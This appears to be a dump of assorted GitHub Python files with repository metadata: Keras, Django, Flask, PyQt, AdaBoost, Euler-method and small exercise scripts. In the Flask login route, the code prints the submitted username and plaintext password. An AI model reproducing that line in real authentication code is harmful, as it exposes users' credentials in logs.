activation='relu',
input_shape=input_shape))
model.add(BatchNormalization())
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(BatchNormalization())
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss = 'categorical_crossentropy',
optimizer = keras.optimizers.Adadelta(),
metrics = ['accuracy'])
print(model.summary())
history = model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
pran=score[1]
pran
|
[
"praneethkothapally102@gmail.com"
] |
praneethkothapally102@gmail.com
|
c413ca59ce0807612bc27516d70a155bab6ff5c4
|
ce6efac2d0339c08566f684e7ff425e8432c380f
|
/datas.py
|
ea47f8c237f1799b0785f4c1ffc645a1ed2bb48b
|
[] |
no_license
|
agb91/Icebergs
|
728bdaec548968e781ce846dd063356776858ad8
|
938010528003695b96cd47115491decef0a015ec
|
refs/heads/master
| 2022-01-22T15:12:25.557895
| 2019-07-29T10:24:27
| 2019-07-29T10:24:27
| 111,598,323
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 214
|
py
|
from import_all import *
class Datas:
#easy object, just contains some informations
def __init__( self, X_train, y_train, X_test ):
self.X_train = X_train
self.y_train = y_train
self.X_test = X_test
|
[
"andrea.damio1991@hotmail.it"
] |
andrea.damio1991@hotmail.it
|
d20a7e91da0fed90cf53eb24e3cd727e85282669
|
632747fbfbf1122497792291cb5a6a9f24add48d
|
/codewars/summation.py
|
41fa1933b4bf4226cf0bc5a1581c76da79881398
|
[] |
no_license
|
mjoze/kurs_python
|
892ac4fab7f3b3fb1d88b236c362a7630a565af7
|
78ec0dda34a5450a4c47d79f3957c65dfbac0276
|
refs/heads/master
| 2020-08-07T10:54:56.198237
| 2020-04-30T15:31:50
| 2020-04-30T15:31:50
| 213,421,230
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 361
|
py
|
"""
Summation
Write a program that finds the summation of every number from 1 to num.
The number will always be a positive integer greater than 0.
For example:
summation(2) -> 3
1 + 2
summation(8) -> 36
1 + 2 + 3 + 4 + 5 + 6 + 7 + 8
"""
def summation(num):
sum_numbers = 0
for i in range(1, num + 1):
sum_numbers += i
return sum_numbers
|
[
"mirek.jozefiak@gmail.com"
] |
mirek.jozefiak@gmail.com
|
562c4bebc73931b44bcb49450642a46d9df9ee43
|
851bc00bb6f55159ba9e0f43cd9ab796649099c6
|
/Folien_und_Literaturen/0schon verpasst/Modelle fuer virtuelle Realitaet/ex1/ex1/Christian Henning/explicit_euler.py
|
64d915ef8d59f7da1ec6344ae3ae1bed4024cb2c
|
[] |
no_license
|
JoshuaGhost/lecture_slides
|
67376ac58952f837cf54bebfdacc18b5ec281624
|
3cf78e289d54d2cad63634ff4a36fe7e935fb443
|
refs/heads/master
| 2021-01-20T21:00:58.699150
| 2016-08-22T22:38:42
| 2016-08-22T22:38:42
| 61,571,548
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,604
|
py
|
#!/usr/bin/python
# author Christian Henning - 2843590
from sympy import *
from sympy.parsing.sympy_parser import parse_expr
import matplotlib.pyplot as plt
import os
import math
import sys
y_cur, y_next, y, x_cur, x_next, x, dx = symbols('y_cur, y_next, y, x_cur, x_next, x, dx')
stabilityTest = 0 # used when probing for A stability
epsilon = 0 # used when probing for A stability (break condition)
if len(sys.argv) <> 6:
#########################
### input values
# step size
dx = 0.01
numberOfSteps = 100
# initial values
x_0 = 0
y_0 = 1
# state the differential equation f(y, x).
# y' = f(y, x)
#derivative = 1 - 2 * y
derivative = y**2
########################
# command line inputs for A stability tester
# exit codes: 0 - test passed
# 1 - invalid input arguments
# 2 - method not strictly monotonic decreasing
# 3 - no A stability test was running or test did not finished properly (maybe bacause of the occurence of complex number)
else:
try:
dx = float(sys.argv[1])
numberOfSteps = 0 # just to avoid uninitialized variables
x_0 = float(sys.argv[2])
y_0 = float(sys.argv[3])
derivative = parse_expr(sys.argv[4])
epsilon = float(sys.argv[5])
stabilityTest = 1
except:
print 'Error: Invalid input arguments.'
sys.exit(1)
#Note, that for the explicit euler method you have to exchange the function y by its current value y_cur
derivative = derivative.subs(x, x_cur)
derivative = derivative.subs(y, y_cur)
# method to write results into csv file
def writeCSVFile(x,y):
# the csv file will have the same name as this script but with the extension '.csv'
fileName, fileExtension = os.path.splitext(os.path.basename(__file__))
csv = open(fileName + '.csv', "w")
for i in range(0,len(x)):
csv.write("%f\t%f\n" % (x[i], y[i]))
csv.close()
# we are considering differential equations like: y' = f(y, x)
eulerMethod = y_cur + dx * derivative
x = list([x_0])
y = list([y_0])
i = 0;
while stabilityTest == 1 or i < numberOfSteps:
i = i+1
x.append(x[i-1] + dx)
tempExpr = eulerMethod.subs(x_cur, x[i-1]);
tempExpr = tempExpr.subs(y_cur, y[i-1]);
try:
# add next value
y.append(float(tempExpr))
except:
print 'Warning: Result seems to be complex. Approximation stopped.'
del x[-1]
break
if stabilityTest == 1:
# function is not strictly monotonic decreasing
if y[i] >= y[i-1]:
sys.exit(2)
if math.fabs(y[i]) < epsilon:
sys.exit(0)
if stabilityTest <> 1:
writeCSVFile(x,y);
# plot the solution
plt.plot(x,y)
plt.xlabel('x')
plt.ylabel('y(x)')
plt.show()
sys.exit(3)
|
[
"joshuaghost@gmail.com"
] |
joshuaghost@gmail.com
|
6706fc44bdc8960ccc269b1cafb7966e6c0245a5
|
eb2b022e95fd310df0c2102d2329a13345534a8a
|
/cart/forms.py
|
00b0673a3412db9fa77e30ba6653a17b1855a39e
|
[] |
no_license
|
Agmella/Ecommerce-website-AP-
|
a86f6ea9a72361cfaa07c9aad1d06bdb56ce66a8
|
c49d4c49243e9abd0967428bc349ad6a0815f5d0
|
refs/heads/master
| 2023-04-28T23:17:16.320421
| 2019-10-24T18:01:41
| 2019-10-24T18:01:41
| 215,369,311
| 0
| 0
| null | 2023-04-21T20:39:10
| 2019-10-15T18:29:33
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 641
|
py
|
from django import forms
from .models import order
#Quantity = [tuple([x,x]) for x in range(1,32)]
#class CartForm(forms.Form):
# quantity = forms.IntegerField(label='Quantity')
class PaymentInfo(forms.ModelForm):
name = forms.CharField(label='Name', max_length=100)
mobile = forms.CharField(label='Mobile No.', max_length=100)
email = forms.EmailField(label = 'Email ID')
address = forms.CharField(label='Shipping Address', max_length=100)
method = forms.CharField(label='Payment Method' , max_length=100)
class Meta:
model = order
fields = ('name', 'mobile', 'email', 'address', 'method')
|
[
"avneeshgarimella@gmail.com"
] |
avneeshgarimella@gmail.com
|
6adbfbe0c7845c0852f0fff38504793bdcc8bcb7
|
a0041845c05228da96d55a0aa8a06780180df7b2
|
/employee/urls.py
|
d9df0a857fd118cb12bdd65d6f596737faecf7a5
|
[] |
no_license
|
mnosinov/drf_sjlouji_project
|
e2f9a66c7bbf42a937ab76a4839053e9c479d9bd
|
95fa48b12d30dfd47c8ed3ae7d4e8ac7748c02f2
|
refs/heads/master
| 2023-04-06T09:58:59.197792
| 2021-03-26T05:07:39
| 2021-03-26T05:07:39
| 351,310,237
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 345
|
py
|
from django.urls import path
from .api import EmployeeCreateAPI, EmployeeAPI, EmployeeUpdateAPI, EmployeeDeleteAPI
urlpatterns = [
path('api', EmployeeAPI.as_view()),
path('api/create', EmployeeCreateAPI.as_view()),
path('api/<int:pk>', EmployeeUpdateAPI.as_view()),
path('api/<int:pk>/delete', EmployeeDeleteAPI.as_view()),
]
|
[
"mnosinov@gmail.com"
] |
mnosinov@gmail.com
|
504441bfe7c528f8656753ca54b4d8e057d221fe
|
778a88f23fe3d44798eb895bbd3a99734f77419b
|
/AdaBoost.py
|
9c457dadbb7ea118c54adae3e10c0f2666969148
|
[] |
no_license
|
KingJames777/Ensemble
|
5e837a0f59a04c8d290414681d9b82fba034d580
|
da8ac3114a184a42fa9e4d9d6042516fbb551483
|
refs/heads/master
| 2020-04-30T14:45:52.825136
| 2019-03-21T08:26:37
| 2019-03-21T08:26:37
| 176,901,441
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,644
|
py
|
from sklearn.datasets import load_breast_cancer as lbc
from sklearn.model_selection import train_test_split as tts
from sklearn.metrics import accuracy_score
from numpy import *
from ROC import roc
def cut_value_array(X,points=10):
low,up=X.min(),X.max()
res=zeros(points)
step=(up-low)/points
res[0]=low+step/2
for i in range(1,points):
res[i]=res[i-1]+step
return res
def classifier(X,cut_point,flag):
pred=ones(len(X))
if flag==0:
pred[X<=cut_point]=-1
else:
pred[X>cut_point]=-1
return pred
##输出树桩的特征编号以及对应的划分值,误差率
def DecisionStump(X,y,weight,points):
m,n=X.shape; stump={}; error=inf
for i in range(n):
cut_points=cut_value_array(X[:,i],points)
for j in range(points):
for flag in [0,1]:
pred=classifier(X[:,i],cut_points[j],flag)
temp_error=sum(weight*(pred!=y)) ## 准确率当成错误率!
if temp_error<error:
error=temp_error
stump['value'],stump['featNum']=cut_points[j],i
stump['inequa'],stump['pred']=flag,pred ##忘记更新!
stump['alpha']=0.5*log(1/error-1)
return stump
def train(X,y,n_estimators,points=10):
m=shape(X)[0]; weight=ones(m)/m; stumps=[]; error=inf
while n_estimators>0:
stump=DecisionStump(X,y,weight,points)
pred=stump.pop('pred')
stumps.append(stump)
temp=exp(-stump['alpha']*y*pred) ##更新样本权重
weight*=temp
temp=sum(weight)
weight/=temp
n_estimators-=1
return stumps
def predict(X,stumps):
m,n=len(X),len(stumps)
pred=zeros(m)
for i in range(n):
pred+=stumps[i]['alpha']*classifier(X[:,stumps[i]['featNum']],
stumps[i]['value'],stumps[i]['inequa'])
return pred,sign(pred)
if __name__=='__main__':
Data=lbc(); X=Data.data; y=Data.target; y[y==0]=-1
X_train, X_test, y_train, y_test=tts(X,y,random_state=1990,test_size=0.2,stratify=y)
stumps=train(X_train,y_train,50,15) ##特征划分也是要考虑的超参数
prob,pred=predict(X_test,stumps)
print(accuracy_score(pred,y_test))
roc(prob,y_test)
|
[
"noreply@github.com"
] |
KingJames777.noreply@github.com
|
34b07997787425ab13acbd59fa8ba3cdb4f23876
|
b501a5eae1018c1c26caa96793c6ee17865ebb2d
|
/data_persistence_and_exchange/csv/csv_reader.py
|
2676d2c1149e1ffb361cfef0b2206a62029b800d
|
[] |
no_license
|
jincurry/standard_Library_Learn
|
12b02f9e86d31ca574bb6863aefc95d63cc558fc
|
6c7197f12747456e0f1f3efd09667682a2d1a567
|
refs/heads/master
| 2022-10-26T07:28:36.545847
| 2018-05-04T12:54:50
| 2018-05-04T12:54:50
| 125,447,397
| 0
| 1
| null | 2022-10-02T17:21:50
| 2018-03-16T01:32:50
|
Python
|
UTF-8
|
Python
| false
| false
| 127
|
py
|
import csv
import sys
with open(sys.argv[1], 'rt') as f:
reader = csv.reader(f)
for row in reader:
print(row)
|
[
"jintao422516@gmail.com"
] |
jintao422516@gmail.com
|
21682bc1c9f6985730eb98b0a543fba2fd37a893
|
8340124261bb2ff02ad4234c7e1f05ca6b8c5071
|
/imylu/linear_model/regression_base.py
|
e598b9e66251e827d74024abed65f9edade94d7d
|
[
"Apache-2.0"
] |
permissive
|
chenxushu1025/imylu
|
db49d71bebc6216efdcdc7c315152ae905f39717
|
984aaa5abe2fe95999b5a84b458acde33b08c2ae
|
refs/heads/master
| 2020-04-11T08:02:02.963860
| 2018-12-03T09:04:08
| 2018-12-03T09:04:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,988
|
py
|
# -*- coding: utf-8 -*-
"""
@Author: tushushu
@Date: 2018-06-27 11:25:30
@Last Modified by: tushushu
@Last Modified time: 2018-06-27 11:25:30
"""
from random import sample, normalvariate
class RegressionBase(object):
def __init__(self):
"""Regression base class.
Attributes:
bias: b
weights: W
alpha: α
"""
self.bias = None
self.weights = None
self.alpha = None
self.fn = None
def _predict(self, Xi):
"""y = WX + b.
Arguments:
Xi {list} -- 1d list object with int or float.
Returns:
float -- y
"""
ret = sum(wi * xij for wi, xij in zip(self.weights, Xi)) + self.bias
return self.fn(ret) if self.fn else ret
def _get_gradient_delta(self, Xi, yi):
"""Calculate the gradient delta of the partial derivative.
Arguments:
Xi {list} -- 1d list object with int.
yi {float}
Returns:
NotImplemented
"""
return NotImplemented
def _batch_gradient_descent(self, X, y, lr, epochs):
"""Update the gradient by the whole dataset.
b = b - learning_rate * 1/m * b_grad_i, b_grad_i <- grad
W = W - learning_rate * 1/m * w_grad_i, w_grad_i <- grad
Arguments:
X {list} -- 2D list with int or float.
y {list} -- 1D list with int or float.
lr {float} -- Learning rate.
epochs {int} -- Number of epochs to update the gradient.
"""
m, n = len(X), len(X[0])
self.bias = 0
self.weights = [normalvariate(0, 0.01) for _ in range(n)]
# Calculate the gradient of each epoch(iteration)
for _ in range(epochs):
bias_grad = 0
weights_grad = [0 for _ in range(n)]
# Calculate and sum the gradient delta of each sample
for i in range(m):
bias_grad_delta, weights_grad_delta = self._get_gradient_delta(
X[i], y[i])
bias_grad += bias_grad_delta
weights_grad = [w_grad + w_grad_d for w_grad, w_grad_d
in zip(weights_grad, weights_grad_delta)]
# Update the bias and weight by gradient of current epoch
self.bias += lr * bias_grad * 2 / m
self.weights = [w + lr * w_grad * 2 / m for w,
w_grad in zip(self.weights, weights_grad)]
def _stochastic_gradient_descent(self, X, y, lr, epochs, sample_rate):
"""Update the gradient by the random sample of dataset.
b = b - learning_rate * b_sample_grad_i, b_sample_grad_i <- sample_grad
W = W - learning_rate * w_sample_grad_i, w_sample_grad_i <- sample_grad
Arguments:
X {list} -- 2D list with int or float.
y {list} -- 1D list with int or float.
lr {float} -- Learning rate.
epochs {int} -- Number of epochs to update the gradient.
sample_rate {float} -- Between 0 and 1.
"""
m, n = len(X), len(X[0])
k = int(m * sample_rate)
self.bias = 0
self.weights = [normalvariate(0, 0.01) for _ in range(n)]
# Calculate the gradient of each epoch(iteration)
for _ in range(epochs):
# Calculate the gradient delta of each sample
for i in sample(range(m), k):
bias_grad, weights_grad = self._get_gradient_delta(X[i], y[i])
# Update the bias and weight by gradient of current sample
self.bias += lr * bias_grad
self.weights = [w + lr * w_grad for w,
w_grad in zip(self.weights, weights_grad)]
def fit(self, X, y, lr, epochs, method="batch", sample_rate=1.0,
alpha=None):
"""Train regression model.
Arguments:
X {list} -- 2D list with int or float.
y {list} -- 1D list with int or float.
lr {float} -- Learning rate.
epochs {int} -- Number of epochs to update the gradient.
Keyword Arguments:
method {str} -- "batch" or "stochastic" (default: {"batch"})
sample_rate {float} -- Between 0 and 1 (default: {1.0})
alpha {float} -- Regularization strength. (default: {None})
"""
if alpha is not None:
self.alpha = alpha
assert method in ("batch", "stochastic")
# batch gradient descent
if method == "batch":
self._batch_gradient_descent(X, y, lr, epochs)
# stochastic gradient descent
if method == "stochastic":
self._stochastic_gradient_descent(X, y, lr, epochs, sample_rate)
def predict(self, X):
"""Get the prediction of y.
Arguments:
X {list} -- 2D list with int or float.
Returns:
NotImplemented
"""
return NotImplemented
|
[
"m18591915960@163.com"
] |
m18591915960@163.com
|
50d4ca37296bab8494a4e4629956dba88dc8a4f7
|
cc79dd3c7095448fb7a0532fb2c3bf2d91aecb22
|
/polls/migrations/0002_auto_20200313_0812.py
|
fb63a09b385122589ad074a2721d72f8ff2afa01
|
[] |
no_license
|
SV96/todo
|
62ae6c993e3c0a1fed3fa366cf75f7161886c517
|
4ab20f798f9a133ee2d28fc100ef5c3d3eceefb3
|
refs/heads/master
| 2021-03-26T07:12:49.266087
| 2020-03-16T11:31:54
| 2020-03-16T11:31:54
| 247,683,156
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 376
|
py
|
# Generated by Django 3.0.4 on 2020-03-13 08:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='tods',
name='do_date',
field=models.DateTimeField(auto_now=True),
),
]
|
[
"me.svipul@gmail.com"
] |
me.svipul@gmail.com
|
cfb2bc67a1cc0ce75ffb18cd23e902d26d4590ec
|
292d1a1caedeb603f035e086e1a36a2230a4ede3
|
/messanger.py
|
7bbd19478631eb43747b4db36ac9df6d66371ed7
|
[] |
no_license
|
Phoenix951/Messenger
|
d82a4b1c06f45a34d0eab9067e80d159ba4030d6
|
9a3ca28495bd8ea8e0ce6cf2c84297d3a0091f08
|
refs/heads/master
| 2021-02-08T07:35:18.907661
| 2020-03-01T09:57:46
| 2020-03-01T09:57:46
| 244,124,662
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,964
|
py
|
import requests
import clientui
from PyQt5 import QtWidgets, QtCore
from datetime import datetime
class MessangerWindow(QtWidgets.QMainWindow, clientui.Ui_Messanger):
def __init__(self):
super().__init__()
self.setupUi(self)
self.last_message_time = 0
self.pushButton.pressed.connect(self.sendMessage)
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.getUpdates)
self.timer.start(1000)
def sendMessage(self):
username = self.lineEdit.text()
password = self.lineEdit_2.text()
text = self.textEdit.toPlainText()
if not username:
self.addText("ERROR: username is empty.")
return
if not password:
self.addText("ERROR: password is empty.")
return
response = requests.post(
"http://127.0.0.1:5000/send",
json={"username": username, "password": password, "text": text}
)
if not response.json()["ok"]:
self.addText("ERROR: Access denied")
return
if not text:
self.addText("ERROR: text is empty.")
self.textEdit.clear()
self.textEdit.repaint()
def addText(self, text):
self.textBrowser.append(text)
self.textBrowser.repaint()
def getUpdates(self):
response = requests.get(
"http://127.0.0.1:5000/history",
params={"after": self.last_message_time}
)
data = response.json()
for message in data["messages"]:
beuty_time = datetime.fromtimestamp(message["time"])
beuty_time = beuty_time.strftime("%Y/%m/%d %H:%M:%S")
self.addText(beuty_time + " " + message["username"])
self.addText(message["text"])
self.addText("")
self.last_message_time = message["time"]
app = QtWidgets.QApplication([])
window = MessangerWindow()
window.show()
app.exec_()
|
[
"darkcobra31@gmail.com"
] |
darkcobra31@gmail.com
|
27156a26c7bb0efa665f0ef3bba33ed4d7dabada
|
ce972e94fcdf19d6809d94c2a73595233d1f741d
|
/catkin_ws/devel/.private/tf2_ros/lib/python3/dist-packages/tf2_ros/__init__.py
|
69aa0dcd05e50e77d04503ebd2e77f689637d53d
|
[] |
no_license
|
WilliamZipanHe/reward_shaping_ttr
|
cfa0e26579f31837c61af3e09621b4dad7eaaba2
|
df56cc0153147bb067bc3a0eee0e1e4e1044407f
|
refs/heads/master
| 2022-02-23T05:02:00.120626
| 2019-08-07T21:52:50
| 2019-08-07T21:52:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
# -*- coding: utf-8 -*-
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/local-scratch/xlv/catkin_ws/src/geometry2/tf2_ros/src".split(";")
for p in reversed(__extended_path):
sys_path.insert(0, p)
del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
for p in __extended_path:
src_init_file = os_path.join(p, __name__ + '.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
else:
src_init_file = os_path.join(p, __name__, '__init__.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
del src_init_file
del p
del os_path
del __extended_path
for __execfile in __execfiles:
with open(__execfile, 'r') as __fh:
exec(__fh.read())
del __fh
del __execfile
del __execfiles
|
[
"xlv@cs-mars-01.cmpt.sfu.ca"
] |
xlv@cs-mars-01.cmpt.sfu.ca
|
645d2e4c75fec3b66e9259390978440dbdf224ed
|
3441669466b82df5c357412d9423e174a1e6a9c7
|
/setup.py
|
9104c5c45f5bc47fb9a434c230602f000b5c993a
|
[
"MIT"
] |
permissive
|
icetemple/genrss
|
a725b66dc67ea2785a6ee70229921d45ab57fb30
|
ddc2724684c96b3eaac9820cb82de7ddbcbddda8
|
refs/heads/master
| 2022-10-06T10:55:38.873579
| 2022-09-27T12:26:21
| 2022-09-27T12:26:21
| 198,481,237
| 17
| 1
|
MIT
| 2022-09-27T12:26:22
| 2019-07-23T17:48:39
|
Python
|
UTF-8
|
Python
| false
| false
| 635
|
py
|
from setuptools import setup
with open('README.md', 'r') as f:
readme = f.read()
if __name__ == '__main__':
setup(
name='genrss',
version='1.0.6',
author='Dmitriy Pleshevskiy',
author_email='dmitriy@ideascup.me',
description='RSS feed generator for python',
long_description=readme,
long_description_content_type='text/markdown',
package_data={'': ['LICENSE', 'README.md']},
include_package_data=True,
license='MIT',
packages=['genrss'],
install_requires=[
'lxml>=4.3.4',
'pytz==2019.1'
]
)
|
[
"dmitriy@ideascup.me"
] |
dmitriy@ideascup.me
|
c05b08f80244954da7bfd5b85a371abc60184769
|
723b67f6a8b202dc5bb009427f60ffd9f185dba8
|
/build/ros_arduino_bridge/ros_arduino_msgs/catkin_generated/pkg.installspace.context.pc.py
|
6549f05a69eed882ecc868edef3bb97aa159f598
|
[] |
no_license
|
Dhawgupta/catkin_ws
|
15edced50d3d69bf78851315658646cd671eb911
|
edab645f1a94c83925836b36d38ecf2ad8f42abc
|
refs/heads/master
| 2021-01-19T10:56:09.954495
| 2017-04-11T09:52:20
| 2017-04-11T09:52:20
| 87,917,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 474
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "/home/dawg/catkin_ws/install/include".split(';') if "/home/dawg/catkin_ws/install/include" != "" else []
PROJECT_CATKIN_DEPENDS = "message_runtime;std_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "ros_arduino_msgs"
PROJECT_SPACE_DIR = "/home/dawg/catkin_ws/install"
PROJECT_VERSION = "0.2.0"
|
[
"dhawal.cs15@iitp.ac.in"
] |
dhawal.cs15@iitp.ac.in
|
d8dc0ac5d39f9570627b88d136d4236c42105090
|
169b85e868816faa7b474507c414062e4ffce573
|
/geo/views/user.py
|
570634e67d145f0187e2f263a709b1c4f4a24dfd
|
[
"MIT"
] |
permissive
|
hariharshankar/pygeo
|
c7bfb8cfdbfe94a1f2830dfcf5bd55a79c9dbd1a
|
f87b5f117dd35e8c6491d1c627cc795e416df6f9
|
refs/heads/master
| 2020-12-29T02:31:44.260477
| 2017-10-28T18:36:33
| 2017-10-28T18:36:33
| 17,834,680
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,331
|
py
|
import flask
from geo.core.geo_user import GeoUser
db = None
mod = flask.Blueprint("user", __name__)
@mod.route("/login", endpoint='login', methods=['POST'])
def login():
request = flask.request
session = flask.session
username = request.form['username']
password = request.form['password']
print(username, password)
try:
user = GeoUser(db, username=username)
print(user.firstname)
except AttributeError as e:
print(e)
return flask.jsonify(data={'error': True})
if user.validate_user(password):
session['username'] = username
session['user_fname'] = user.firstname
session['user_lname'] = user.lastname
session['user_id'] = user.user_id
session['moderator_user'] = user.moderator_user
data = {}
data['fullname'] = "%s %s" % (user.firstname, user.lastname)
return flask.jsonify(data=data)
return flask.jsonify(data={'error': True})
@mod.route("/logout", endpoint='logout', methods=['GET'])
def logout():
session = flask.session
session.pop('username', None)
session.pop('user_fname', None)
session.pop('user_lname', None)
session.pop('user_id', None)
session.pop('moderator_user', None)
nex = flask.request.args.get("next", "/")
return flask.redirect(nex)
|
[
"hariharshankar@gmail.com"
] |
hariharshankar@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.